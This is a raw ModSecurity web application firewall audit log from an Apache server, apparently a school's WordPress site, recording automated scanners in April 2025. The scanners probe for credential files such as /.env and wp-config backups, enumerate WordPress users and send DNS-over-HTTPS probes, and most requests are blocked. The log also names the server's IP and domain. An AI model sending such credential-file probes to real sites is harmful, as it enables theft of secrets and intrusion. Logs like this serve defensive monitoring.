Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1ea146f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745366824997131 3194 (- - -) Stopwatch2: 1745366824997131 3194; combined=1455, p1=491, p2=933, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1ea146f-Z-- --a1bbf21f-A-- [23/Apr/2025:07:07:25 +0700] aAgvPRuwXEWV6ydgl530QwAAABM 103.236.140.4 38036 103.236.140.4 8181 --a1bbf21f-B-- GET /wp-config.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.216.113.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.216.113.180 X-Forwarded-Proto: http Connection: close Accept: */* --a1bbf21f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1bbf21f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745366845986971 907 (- - -) Stopwatch2: 1745366845986971 907; combined=391, p1=349, p2=0, p3=0, p4=0, p5=42, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1bbf21f-Z-- --be2cff16-A-- [23/Apr/2025:07:36:15 +0700] aAg1_z1ahuoJLEjKiAWy-wAAAIY 103.236.140.4 44988 103.236.140.4 8181 --be2cff16-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.90.208.56 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.90.208.56 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --be2cff16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be2cff16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745368575508371 744 (- - -) Stopwatch2: 1745368575508371 744; combined=289, p1=255, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be2cff16-Z-- --81547b5b-A-- [23/Apr/2025:08:26:40 +0700] aAhB0D1ahuoJLEjKiAW2RQAAAJQ 103.236.140.4 57178 103.236.140.4 8181 --81547b5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.65.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.65.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --81547b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81547b5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745371600376386 902 (- - -) Stopwatch2: 1745371600376386 902; combined=425, p1=371, p2=0, p3=0, p4=0, p5=54, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81547b5b-Z-- --75eaab2b-A-- [23/Apr/2025:10:24:45 +0700] aAhdfT1ahuoJLEjKiAXBBgAAAIk 103.236.140.4 46016 103.236.140.4 8181 --75eaab2b-B-- GET /.env.config HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --75eaab2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75eaab2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378685787804 792 (- - -) Stopwatch2: 1745378685787804 792; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75eaab2b-Z-- --e90b2234-A-- [23/Apr/2025:10:24:46 +0700] aAhdfjI97BrbgvDq16TjwQAAANE 103.236.140.4 46018 103.236.140.4 8181 --e90b2234-B-- GET /.env.secret HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --e90b2234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e90b2234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378686126646 755 (- - -) Stopwatch2: 1745378686126646 755; combined=307, p1=272, p2=0, p3=0, p4=0, p5=35, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e90b2234-Z-- --fefbc705-A-- [23/Apr/2025:10:24:46 +0700] aAhdfhuwXEWV6ydgl50GXgAAAAk 103.236.140.4 46024 103.236.140.4 8181 --fefbc705-B-- GET /prod/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --fefbc705-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fefbc705-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378686463473 652 (- - -) Stopwatch2: 1745378686463473 652; combined=258, p1=224, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fefbc705-Z-- --16fa4667-A-- [23/Apr/2025:10:24:47 +0700] aAhdfz1ahuoJLEjKiAXBBwAAAIo 103.236.140.4 46030 103.236.140.4 8181 --16fa4667-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --16fa4667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16fa4667-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378687486566 673 (- - -) Stopwatch2: 1745378687486566 673; combined=267, p1=234, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16fa4667-Z-- --8b337d48-A-- [23/Apr/2025:10:24:48 +0700] aAhdgD1ahuoJLEjKiAXBCAAAAJE 103.236.140.4 46032 103.236.140.4 8181 --8b337d48-B-- GET /.env.template HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --8b337d48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b337d48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378688160663 630 (- - -) Stopwatch2: 1745378688160663 630; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b337d48-Z-- --6564da54-A-- [23/Apr/2025:12:27:15 +0700] aAh6MxuwXEWV6ydgl50THAAAAAQ 103.236.140.4 35532 103.236.140.4 8181 --6564da54-B-- GET /wp-config.php.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 108.167.189.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 108.167.189.34 X-Forwarded-Proto: http Connection: close Accept: */* --6564da54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6564da54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745386035804852 1205 (- - -) Stopwatch2: 1745386035804852 1205; combined=372, p1=328, p2=0, p3=0, p4=0, p5=44, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6564da54-Z-- --cf314c51-A-- [23/Apr/2025:13:03:17 +0700] aAiCpRuwXEWV6ydgl50WFQAAABI 103.236.140.4 45206 103.236.140.4 8181 --cf314c51-B-- GET /wp-config.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.46.105.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.46.105.243 X-Forwarded-Proto: http Connection: close Accept: */* --cf314c51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf314c51-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745388197048577 3487 (- - -) Stopwatch2: 1745388197048577 3487; combined=1534, p1=675, p2=824, p3=0, p4=0, p5=34, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf314c51-Z-- --c606dc30-A-- [23/Apr/2025:14:56:24 +0700] aAidKD1ahuoJLEjKiAXSbwAAAIk 103.236.140.4 45174 103.236.140.4 8181 --c606dc30-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.70.100.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.70.100.6 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --c606dc30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c606dc30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745394984147430 2125 (- - -) Stopwatch2: 1745394984147430 2125; combined=979, p1=328, p2=596, p3=0, p4=0, p5=54, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c606dc30-Z-- --10724e09-A-- [23/Apr/2025:15:21:06 +0700] aAii8tIw_rqnm4P5_adj9AAAAE8 103.236.140.4 51324 103.236.140.4 8181 --10724e09-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.231.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.231.159 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --10724e09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10724e09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745396466493198 690 (- - -) Stopwatch2: 1745396466493198 690; combined=304, p1=272, p2=0, p3=0, p4=0, p5=32, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10724e09-Z-- --eb3bc210-A-- [23/Apr/2025:15:33:16 +0700] aAilzD1ahuoJLEjKiAXVPQAAAI0 103.236.140.4 54400 103.236.140.4 8181 --eb3bc210-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --eb3bc210-C-- 7Íexamplecom --eb3bc210-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb3bc210-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397196644341 3106 (- - -) Stopwatch2: 1745397196644341 3106; combined=1912, p1=490, p2=1346, p3=17, p4=20, p5=39, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb3bc210-Z-- --68cc7934-A-- [23/Apr/2025:15:33:16 +0700] aAilzDI97BrbgvDq16T94wAAAM0 103.236.140.4 54406 103.236.140.4 8181 --68cc7934-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --68cc7934-C-- iexamplecom --68cc7934-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --68cc7934-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397196936999 3084 (- - -) Stopwatch2: 1745397196936999 3084; combined=2077, p1=451, p2=1559, p3=19, p4=23, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68cc7934-Z-- --1fc92733-A-- [23/Apr/2025:15:33:17 +0700] aAilzTI97BrbgvDq16T95AAAAM4 103.236.140.4 54416 103.236.140.4 8181 --1fc92733-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --1fc92733-C-- š$examplecom --1fc92733-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fc92733-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397197235753 3445 (- - -) Stopwatch2: 1745397197235753 3445; combined=2232, p1=443, p2=1711, p3=24, p4=27, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fc92733-Z-- --5247817c-A-- [23/Apr/2025:15:33:17 +0700] aAilzT1ahuoJLEjKiAXVQAAAAI4 103.236.140.4 54422 103.236.140.4 8181 --5247817c-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --5247817c-C-- 0examplecom --5247817c-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5247817c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397197529577 3242 (- - -) Stopwatch2: 1745397197529577 3242; combined=2123, p1=505, p2=1551, p3=19, p4=23, p5=25, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5247817c-Z-- --d9b1db24-A-- [23/Apr/2025:15:33:17 +0700] aAilzT1ahuoJLEjKiAXVQQAAAJM 103.236.140.4 54428 103.236.140.4 8181 --d9b1db24-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d9b1db24-C-- }Kexamplecom --d9b1db24-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9b1db24-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397197821265 2576 (- - -) Stopwatch2: 1745397197821265 2576; combined=1713, p1=326, p2=1334, p3=16, p4=18, p5=19, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9b1db24-Z-- --d3772b7b-A-- [23/Apr/2025:15:33:18 +0700] aAilzj1ahuoJLEjKiAXVQgAAAJE 103.236.140.4 54434 103.236.140.4 8181 --d3772b7b-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d3772b7b-C-- Texamplecom --d3772b7b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3772b7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397198121279 3087 (- - -) Stopwatch2: 1745397198121279 3087; combined=1972, p1=418, p2=1486, p3=20, p4=23, p5=24, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3772b7b-Z-- --0a8dad21-A-- [23/Apr/2025:15:33:18 +0700] aAilzjI97BrbgvDq16T96gAAANM 103.236.140.4 54444 103.236.140.4 8181 --0a8dad21-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --0a8dad21-C-- Š>examplecom --0a8dad21-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --0a8dad21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397198415207 2616 (- - -) Stopwatch2: 1745397198415207 2616; combined=1685, p1=385, p2=1232, p3=25, p4=19, p5=24, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a8dad21-Z-- --7ae94753-A-- [23/Apr/2025:15:33:19 +0700] aAilzzI97BrbgvDq16T97QAAAMI 103.236.140.4 54450 103.236.140.4 8181 --7ae94753-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --7ae94753-C-- ÿuexamplecom 